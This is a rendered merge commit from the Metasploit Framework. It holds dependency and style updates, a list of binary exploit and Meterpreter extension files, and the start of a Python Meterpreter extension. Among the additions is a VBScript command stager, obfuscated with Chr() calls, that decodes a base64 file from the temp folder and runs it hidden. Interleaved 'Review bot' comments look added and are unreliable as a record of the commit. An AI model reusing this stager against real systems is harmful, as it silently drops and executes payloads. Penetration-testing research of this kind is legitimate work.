
Merge branch 'rapid7' into cleanup/remove-id-tags

Conflicts:
	lib/msf/core/payload/osx/bundleinject.rb
	lib/msf/core/payload/windows/dllinject.rb
	lib/msf/core/payload/windows/exec.rb
	lib/msf/core/payload/windows/loadlibrary.rb
	lib/msf/core/payload/windows/reflectivedllinject.rb
	lib/msf/core/payload/windows/x64/reflectivedllinject.rb
	scripts/meterpreter/netenum.rb
James Lee 6 years ago
parent
commit
c77d49a640
100 changed files with 4851 additions and 2663 deletions
  1. 5
    4
      .gitignore
  2. 2
    0
      .mailmap
  3. 1
    0
      .ruby-gemset
  4. 1
    0
      .ruby-version
  5. 6
    0
      CONTRIBUTING.md
  6. 2
    2
      COPYING
  7. 6
    4
      Gemfile
  8. 35
    35
      Gemfile.lock
  9. 6
    5
      HACKING
  10. 1
    1
      README.md
  11. BIN
      data/android/apk/AndroidManifest.xml
  12. BIN
      data/android/apk/classes.dex
  13. BIN
      data/android/apk/res/drawable-mdpi/icon.png
  14. BIN
      data/android/apk/res/layout/main.xml
  15. BIN
      data/android/apk/resources.arsc
  16. BIN
      data/android/meterpreter.jar
  17. BIN
      data/android/metstage.jar
  18. BIN
      data/android/shell.jar
  19. BIN
      data/exploits/CVE-2013-2171.bin
  20. BIN
      data/exploits/CVE-2013-2465/Exploit$MyColorModel.class
  21. BIN
      data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class
  22. BIN
      data/exploits/CVE-2013-2465/Exploit.class
  23. 49
    0
      data/exploits/cmdstager/vbs_b64_noquot
  24. BIN
      data/exploits/cve-2013-0758.swf
  25. BIN
      data/exploits/cve-2013-1488/Exploit.class
  26. BIN
      data/exploits/cve-2013-1488/FakeDriver.class
  27. BIN
      data/exploits/cve-2013-1488/FakeDriver2.class
  28. 1
    0
      data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
  29. 2
    0
      data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
  30. BIN
      data/exploits/cve-2013-2460/DisableSecurityManagerAction.class
  31. BIN
      data/exploits/cve-2013-2460/ExpProvider.class
  32. BIN
      data/exploits/cve-2013-2460/Exploit.class
  33. BIN
      data/exploits/cve-2013-3660/exploit.dll
  34. BIN
      data/meterpreter/elevator.dll
  35. BIN
      data/meterpreter/elevator.x64.dll
  36. BIN
      data/meterpreter/elevator.x86.dll
  37. BIN
      data/meterpreter/ext_server_espia.dll
  38. BIN
      data/meterpreter/ext_server_espia.x64.dll
  39. BIN
      data/meterpreter/ext_server_espia.x86.dll
  40. BIN
      data/meterpreter/ext_server_incognito.dll
  41. BIN
      data/meterpreter/ext_server_incognito.x64.dll
  42. BIN
      data/meterpreter/ext_server_incognito.x86.dll
  43. BIN
      data/meterpreter/ext_server_lanattacks.dll
  44. BIN
      data/meterpreter/ext_server_lanattacks.x64.dll
  45. BIN
      data/meterpreter/ext_server_lanattacks.x86.dll
  46. BIN
      data/meterpreter/ext_server_mimikatz.dll
  47. BIN
      data/meterpreter/ext_server_mimikatz.x64.dll
  48. BIN
      data/meterpreter/ext_server_mimikatz.x86.dll
  49. BIN
      data/meterpreter/ext_server_priv.dll
  50. BIN
      data/meterpreter/ext_server_priv.x64.dll
  51. BIN
      data/meterpreter/ext_server_priv.x86.dll
  52. BIN
      data/meterpreter/ext_server_sniffer.dll
  53. BIN
      data/meterpreter/ext_server_sniffer.x64.dll
  54. BIN
      data/meterpreter/ext_server_sniffer.x86.dll
  55. BIN
      data/meterpreter/ext_server_stdapi.dll
  56. BIN
      data/meterpreter/ext_server_stdapi.jar
  57. 865
    0
      data/meterpreter/ext_server_stdapi.py
  58. BIN
      data/meterpreter/ext_server_stdapi.x64.dll
  59. BIN
      data/meterpreter/ext_server_stdapi.x86.dll
  60. BIN
      data/meterpreter/meterpreter.jar
  61. 415
    0
      data/meterpreter/meterpreter.py
  62. BIN
      data/meterpreter/metsrv.dll
  63. BIN
      data/meterpreter/metsrv.x64.dll
  64. BIN
      data/meterpreter/metsrv.x86.dll
  65. BIN
      data/meterpreter/screenshot.dll
  66. BIN
      data/meterpreter/screenshot.x64.dll
  67. BIN
      data/meterpreter/screenshot.x86.dll
  68. 24
    0
      data/templates/scripts/to_exe.asp.template
  69. 30
    0
      data/templates/scripts/to_exe.aspx.template
  70. 81
    0
      data/templates/scripts/to_exe.vba.template
  71. 24
    0
      data/templates/scripts/to_exe.vbs.template
  72. 49
    0
      data/templates/scripts/to_exe_jsp.war.template
  73. 32
    0
      data/templates/scripts/to_mem.vba.template
  74. 30
    0
      data/templates/scripts/to_mem_dotnet.ps1.template
  75. 20
    0
      data/templates/scripts/to_mem_old.ps1.template
  76. 1024
    0
      data/wordlists/burnett_top_1024.txt
  77. 500
    0
      data/wordlists/burnett_top_500.txt
  78. 8
    0
      data/wordlists/http_owa_common.txt
  79. 1000
    0
      data/wordlists/ipmi_passwords.txt
  80. 5
    0
      data/wordlists/ipmi_users.txt
  81. 34
    64
      db/schema.rb
  82. 4
    5
      documentation/samples/modules/auxiliary/sample.rb
  83. 2
    2
      documentation/samples/modules/encoders/sample.rb
  84. 147
    0
      documentation/samples/modules/exploits/ie_browser.rb
  85. 12
    11
      documentation/samples/modules/exploits/sample.rb
  86. 2
    2
      documentation/samples/modules/nops/sample.rb
  87. 1
    1
      documentation/samples/modules/payloads/singles/sample.rb
  88. 40
    0
      documentation/samples/modules/post/sample.rb
  89. 132
    0
      documentation/samples/scripts/resource_script.rb
  90. 0
    459
      external/pcaprub/LICENSE
  91. 0
    43
      external/pcaprub/README
  92. 0
    117
      external/pcaprub/extconf.rb
  93. 0
    816
      external/pcaprub/netifaces.c
  94. 0
    184
      external/pcaprub/netifaces.h
  95. 0
    783
      external/pcaprub/pcaprub.c
  96. 0
    125
      external/pcaprub/test_pcaprub.rb
  97. 2
    0
      external/source/exploits/CVE-2013-2171/Makefile
  98. 54
    0
      external/source/exploits/CVE-2013-2171/exploit.c
  99. 197
    0
      external/source/exploits/CVE-2013-2465/Exploit.java
  100. 0
    0
      external/source/exploits/CVE-2013-2465/Makefile

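--- a/.gitignore
+++ b/.gitignore
@@ -1,10 +1,9 @@
 .bundle
 # Rubymine project directory
 .idea
-# Portable ruby version files for rvm
-.ruby-gemset
-.ruby-version
-# RVM control file
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
 # YARD cache directory
 .yardoc
@@ -40,3 +39,5 @@ tags
 *.orig
 *.rej
 *~
+# Ignore backups of retabbed files
+*.notab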
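Review bot: The new comment `# RVM control file, keep this to avoid backdooring Metasploit` leaves it unclear what "keep this" refers to. `.rvmrc` is evaluated by RVM on directory entry, so it is the ignore entry that matters: it keeps a `.rvmrc` from being committed and then executed on every contributor's checkout. Suggest `# RVM control file: keep .rvmrc ignored so a committed copy cannot run code on checkout`. Un-ignoring `.ruby-gemset` and `.ruby-version` (now tracked by this commit) is fine, since those hold only a gemset name and a version string.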

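--- a/.mailmap
+++ b/.mailmap
@@ -27,6 +27,8 @@ wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.
 
+Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
+Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>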

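--- a/.ruby-gemset
+++ b/.ruby-gemset
@@ -0,0 +1 @@
+metasploit-framework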

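--- a/.ruby-version
+++ b/.ruby-version
@@ -0,0 +1 @@
+ruby-1.9.3-p448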

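--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -36,3 +36,9 @@ Pull requests tend to be very collaborative for Metasploit -- do not be
 surprised if your pull request to rapid7/metasploit-framework triggers a
 pull request back to your own fork. In this way, we can isolate working
 changes before landing your PR to the Metasploit master branch.
+
+To save yourself the embarrassment of committing common errors, you will
+want to symlink the `msftidy.rb` utility to your pre-commit hooks by
+running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
+from the top-level directory of your metasploit-framework clone. This
+will prevent you from committing modules that raise WARNINGS or ERRORS.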

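--- a/COPYING
+++ b/COPYING
@@ -11,7 +11,7 @@ are permitted provided that the following conditions are met:
 	  this list of conditions and the following disclaimer in the documentation
 	  and/or other materials provided with the distribution.
 
-    * Neither the name of Rapid7 LLC nor the names of its contributors
+    * Neither the name of Rapid7, Inc. nor the names of its contributors
 	  may be used to endorse or promote products derived from this software
 	  without specific prior written permission.
 
@@ -30,7 +30,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
 The Metasploit Framework is provided under the 3-clause BSD license above.
 
-The copyright on this package is held by Rapid7 LLC.
+The copyright on this package is held by Rapid7, Inc.
 
 This license does not apply to several components within the Metasploit
 Framework source tree.  For more details see the LICENSE file.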

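--- a/Gemfile
+++ b/Gemfile
@@ -10,17 +10,20 @@ gem 'msgpack'
 gem 'nokogiri'
 # Needed by anemone crawler
 gem 'robots'
+# Needed by db.rb and Msf::Exploit::Capture
+gem 'packetfu', '1.1.9'
 
 group :db do
 	# Needed for Msf::DbManager
 	gem 'activerecord'
 	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.14.3'
+	gem 'metasploit_data_models', '~> 0.16.6'
 	# Needed for module caching in Mdm::ModuleDetails
 	gem 'pg', '>= 0.11'
 end
 
 group :pcap do
+  gem 'network_interface', '~> 0.0.1'
 	# For sniffer and raw socket modules
 	gem 'pcaprub'
 end
@@ -38,7 +41,7 @@ group :development, :test do
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
 	# running documentation generation tasks and rspec tasks
-	gem 'rake'
+	gem 'rake', '>= 10.0.0'
 end
 
 group :test do
@@ -48,11 +51,10 @@ group :test do
 	gem 'database_cleaner'
 	# testing framework
 	gem 'rspec', '>= 2.12'
-	# add matchers from shoulda, such as query_the_database, which is useful for
-	# testing that the Msf::DBManager activation is respected.
 	gem 'shoulda-matchers'
 	# code coverage for tests
 	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
 	gem 'simplecov', '0.5.4', :require => false
 	# Manipulate Time.now in specs
 	gem 'timecop'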
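Review bot: The added `gem 'network_interface', '~> 0.0.1'` in the `:pcap` group is indented with two spaces while the two sibling lines in that group, and every other group body in the file, use a hard tab, so the block now mixes indentation. Either match the surrounding tab for now, or retab the whole file in one pass, since HACKING in this same commit switches the guideline to two-space soft tabs. Separately, Gemfile.lock records `remote: http://rubygems.org/`, which suggests the `source` line outside this hunk still uses plain http; gems fetched over an unauthenticated channel can be substituted in transit, so `source 'https://rubygems.org'` would be a worthwhile follow-up.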

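--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,60 +1,58 @@
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
       builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
-    bourne (1.4.0)
-      mocha (~> 0.13.2)
     builder (3.0.4)
-    database_cleaner (0.9.1)
-    diff-lcs (1.2.2)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
     factory_girl (4.2.0)
       activesupport (>= 3.0.0)
-    i18n (0.6.1)
-    json (1.7.7)
-    metaclass (0.0.1)
-    metasploit_data_models (0.14.3)
+    i18n (0.6.5)
+    json (1.8.0)
+    metasploit_data_models (0.16.6)
       activerecord (>= 3.2.13)
       activesupport
       pg
-    mocha (0.13.3)
-      metaclass (~> 0.0.1)
-    msgpack (0.5.4)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
     multi_json (1.0.4)
-    nokogiri (1.5.9)
+    network_interface (0.0.1)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
+    packetfu (1.1.9)
     pcaprub (0.11.3)
-    pg (0.15.1)
-    rake (10.0.4)
-    redcarpet (2.2.2)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
     robots (0.10.1)
-    rspec (2.13.0)
-      rspec-core (~> 2.13.0)
-      rspec-expectations (~> 2.13.0)
-      rspec-mocks (~> 2.13.0)
-    rspec-core (2.13.1)
-    rspec-expectations (2.13.0)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.13.0)
-    shoulda-matchers (1.5.2)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
-      bourne (~> 1.3)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
-    timecop (0.6.1)
+    timecop (0.6.3)
     tzinfo (0.3.37)
-    yard (0.8.5.2)
+    yard (0.8.7)
 
 PLATFORMS
   ruby
@@ -65,12 +63,14 @@ DEPENDENCIES
   database_cleaner
   factory_girl (>= 4.1.0)
   json
-  metasploit_data_models (~> 0.14.3)
+  metasploit_data_models (~> 0.16.6)
   msgpack
+  network_interface (~> 0.0.1)
   nokogiri
+  packetfu (= 1.1.9)
   pcaprub
   pg (>= 0.11)
-  rake
+  rake (>= 10.0.0)
   redcarpet
   robots
   rspec (>= 2.12)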

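--- a/HACKING
+++ b/HACKING
@@ -9,8 +9,8 @@ Code Style
 In order to maintain consistency and readability, we ask that you
 adhere to the following style guidelines:
 
- - Hard tabs, not spaces
- - Try to keep your lines under 100 columns (assuming four-space tabs)
+ - Standard Ruby two-space soft tabs, not hard tabs.
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
 - do; end instead of {} for a block
 - Always use str[0,1] instead of str[0]
   (This avoids a known ruby 1.8/1.9 incompatibility.)
@@ -37,9 +37,10 @@ need user input, you can either register an option or expose an
 interactive session type specific for the type of exploit.
 
 3. Don't use "sleep". It has been known to cause issues with
-multi-threaded programs on various platforms. Instead, we use
-"select(nil, nil, nil, <time>)" throughout the framework. We have
-found this works around the underlying issue.
+multi-threaded programs on various platforms running an older version of
+Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
+Rex.sleep() throughout the framework. We have found this works around
+the underlying issue.
 
 4. Always use Rex sockets, not ruby sockets.  This includes
 third-party libraries such as Net::Http.  There are several very good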

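--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ pull request. For slightly more info, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
 
 
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
 [unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"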

BIN
data/android/apk/AndroidManifest.xml View File


BIN
data/android/apk/classes.dex View File


BIN
data/android/apk/res/drawable-mdpi/icon.png View File


BIN
data/android/apk/res/layout/main.xml View File


BIN
data/android/apk/resources.arsc View File


BIN
data/android/meterpreter.jar View File


BIN
data/android/metstage.jar View File


BIN
data/android/shell.jar View File


BIN
data/exploits/CVE-2013-2171.bin View File


BIN
data/exploits/CVE-2013-2465/Exploit$MyColorModel.class View File


BIN
data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class View File


BIN
data/exploits/CVE-2013-2465/Exploit.class View File


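--- a/data/exploits/cmdstager/vbs_b64_noquot
+++ b/data/exploits/cmdstager/vbs_b64_noquot
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub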

BIN
data/exploits/cve-2013-0758.swf View File


BIN
data/exploits/cve-2013-1488/Exploit.class View File


BIN
data/exploits/cve-2013-1488/FakeDriver.class View File


BIN
data/exploits/cve-2013-1488/FakeDriver2.class View File


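--- a/data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
+++ b/data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine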

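--- a/data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
+++ b/data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2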

BIN
data/exploits/cve-2013-2460/DisableSecurityManagerAction.class View File


BIN
data/exploits/cve-2013-2460/ExpProvider.class View File


BIN
data/exploits/cve-2013-2460/Exploit.class View File


BIN
data/exploits/cve-2013-3660/exploit.dll View File


BIN
data/meterpreter/elevator.dll View File


BIN
data/meterpreter/elevator.x64.dll View File


BIN
data/meterpreter/elevator.x86.dll View File


BIN
data/meterpreter/ext_server_espia.dll View File


BIN
data/meterpreter/ext_server_espia.x64.dll View File


BIN
data/meterpreter/ext_server_espia.x86.dll View File


BIN
data/meterpreter/ext_server_incognito.dll View File


BIN
data/meterpreter/ext_server_incognito.x64.dll View File


BIN
data/meterpreter/ext_server_incognito.x86.dll View File


BIN
data/meterpreter/ext_server_lanattacks.dll View File


BIN
data/meterpreter/ext_server_lanattacks.x64.dll View File


BIN
data/meterpreter/ext_server_lanattacks.x86.dll View File


BIN
data/meterpreter/ext_server_mimikatz.dll View File


BIN
data/meterpreter/ext_server_mimikatz.x64.dll View File


BIN
data/meterpreter/ext_server_mimikatz.x86.dll View File


BIN
data/meterpreter/ext_server_priv.dll View File


BIN
data/meterpreter/ext_server_priv.x64.dll View File


BIN
data/meterpreter/ext_server_priv.x86.dll View File


BIN
data/meterpreter/ext_server_sniffer.dll View File


BIN
data/meterpreter/ext_server_sniffer.x64.dll View File


BIN
data/meterpreter/ext_server_sniffer.x86.dll View File


BIN
data/meterpreter/ext_server_stdapi.dll View File


BIN
data/meterpreter/ext_server_stdapi.jar View File


+ 865
- 0
data/meterpreter/ext_server_stdapi.py View File

@@ -0,0 +1,865 @@
1
+import ctypes
2
+import fnmatch
3
+import getpass
4
+import os
5
+import platform
6
+import shlex
7
+import shutil
8
+import socket
9
+import struct
10
+import subprocess
11
+import sys
12
+
13
+has_windll = hasattr(ctypes, 'windll')
14
+
15
+try:
16
+	import pty
17
+	has_pty = True
18
+except ImportError:
19
+	has_pty = False
20
+
21
+try:
22
+	import pwd
23
+	has_pwd = True
24
+except ImportError:
25
+	has_pwd = False
26
+
27
+try:
28
+	import termios
29
+	has_termios = True
30
+except ImportError:
31
+	has_termios = False
32
+
33
+try:
34
+	import _winreg as winreg
35
+	has_winreg = True
36
+except ImportError:
37
+	has_winreg = False
38
+
39
+class PROCESSENTRY32(ctypes.Structure):
40
+	_fields_ = [("dwSize", ctypes.c_uint32),
41
+		("cntUsage", ctypes.c_uint32),
42
+		("th32ProcessID", ctypes.c_uint32),
43
+		("th32DefaultHeapID", ctypes.c_void_p),
44
+		("th32ModuleID", ctypes.c_uint32),
45
+		("cntThreads", ctypes.c_uint32),
46
+		("th32ParentProcessID", ctypes.c_uint32),
47
+		("thPriClassBase", ctypes.c_int32),
48
+		("dwFlags", ctypes.c_uint32),
49
+		("szExeFile", (ctypes.c_char * 260))]
50
+
51
+class SYSTEM_INFO(ctypes.Structure):
52
+	_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
53
+		("wReserved", ctypes.c_uint16),
54
+		("dwPageSize", ctypes.c_uint32),
55
+		("lpMinimumApplicationAddress", ctypes.c_void_p),
56
+		("lpMaximumApplicationAddress", ctypes.c_void_p),
57
+		("dwActiveProcessorMask", ctypes.c_uint32),
58
+		("dwNumberOfProcessors", ctypes.c_uint32),
59
+		("dwProcessorType", ctypes.c_uint32),
60
+		("dwAllocationGranularity", ctypes.c_uint32),
61
+		("wProcessorLevel", ctypes.c_uint16),
62
+		("wProcessorRevision", ctypes.c_uint16),]
63
+
64
+class SID_AND_ATTRIBUTES(ctypes.Structure):
65
+	_fields_ = [("Sid", ctypes.c_void_p),
66
+		("Attributes", ctypes.c_uint32),]
67
+
68
+##
69
+# STDAPI
70
+##
71
+
72
+#
73
+# TLV Meta Types
74
+#
75
+TLV_META_TYPE_NONE =       (   0   )
76
+TLV_META_TYPE_STRING =     (1 << 16)
77
+TLV_META_TYPE_UINT =       (1 << 17)
78
+TLV_META_TYPE_RAW =        (1 << 18)
79
+TLV_META_TYPE_BOOL =       (1 << 19)
80
+TLV_META_TYPE_COMPRESSED = (1 << 29)
81
+TLV_META_TYPE_GROUP =      (1 << 30)
82
+TLV_META_TYPE_COMPLEX =    (1 << 31)
83
+# not defined in original
84
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
85
+
86
+#
87
+# TLV Specific Types
88
+#
89
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
90
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
91
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
92
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
93
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
94
+
95
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
96
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
97
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
98
+
99
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
100
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
101
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
102
+
103
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
104
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
105
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
106
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
107
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
108
+
109
+##
110
+# General
111
+##
112
+TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
113
+TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
114
+TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
115
+TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
116
+
117
+##
118
+# Fs
119
+##
120
+TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
121
+TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
122
+TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
123
+TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
124
+TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
125
+
126
+TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
127
+
128
+TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
129
+TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
130
+TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
131
+TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
132
+
133
+##
134
+# Net
135
+##
136
+TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
137
+TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
138
+
139
+TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
140
+TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
141
+TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
142
+TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
143
+
144
+TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
145
+TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
146
+TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
147
+TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
148
+
149
+TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
150
+TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
151
+TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
152
+
153
+# Socket
154
+TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
155
